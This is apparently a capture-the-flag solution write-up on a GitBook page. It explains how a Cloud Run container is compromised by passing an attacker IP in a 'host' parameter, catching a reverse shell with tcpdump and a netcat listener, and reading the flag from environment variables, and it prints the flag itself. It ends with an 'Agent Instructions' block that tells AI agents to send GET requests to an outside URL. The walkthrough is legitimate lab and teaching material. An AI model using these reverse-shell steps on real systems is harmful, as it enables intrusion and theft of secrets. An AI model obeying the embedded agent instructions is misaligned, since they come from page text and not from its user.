# Running in the Clouds - Solution

## Introduction

William Swordsworth, the modern day Container hacker/poet wants you to compromise a container that he has set up containing a secret. He promises lots of head breaking, out of the box thinking, packet inspection and swearing.

## Starting point

1. The container is has a public endpoint - `https://ctfcloudrun-sz2ttebtva-uc.a.run.app`.

## Your task

1. Read the flag in the env of the container.

## Walkthrough

1. From the poem, identify the variable name to be passed to the web application. Trying some combinations reveal that the parameter is `host`.
2. Open all ports on the Security Group for the attacker machine
3. Since we don't know what port the reverse shell will connect back to, we need to run `tcpdump` and see which port receives a TCP `RST` packet. On the attacker machine in a new terminal run the following `tcpdump` command

```
tcpdump -ni eth0 -s 1500 port not 22 and port not 53 and not port 443 and not arp
```

4. While `tcpdump` is running, access the cloud run web app and notice the port number the Cloud Run is trying to connect to.
5. Run a `netcat` listener on port 6945 - `nc -nlvp 6945`.
6. Make the web request with the public URL of the app and pass the cloud attacker machine IP as a parameter to the Cloud Run as Cloud Run app and pass the IP of the attacker machine via a GET parameter called `host`.

```
Example: https://ctfcloudrun-sz2ttebtva-uc.a.run.app/?host=<attacker-ip>
```

7. From the reverse shell, dump the environment variables which contains the flag.
8. The flag is `POET_INSIDE_HACKER_OUTSIDE`.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xcriminal.gitbook.io/about-me/cloudsec/solutions/ctf-2-running-in-the-clouds-solution.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.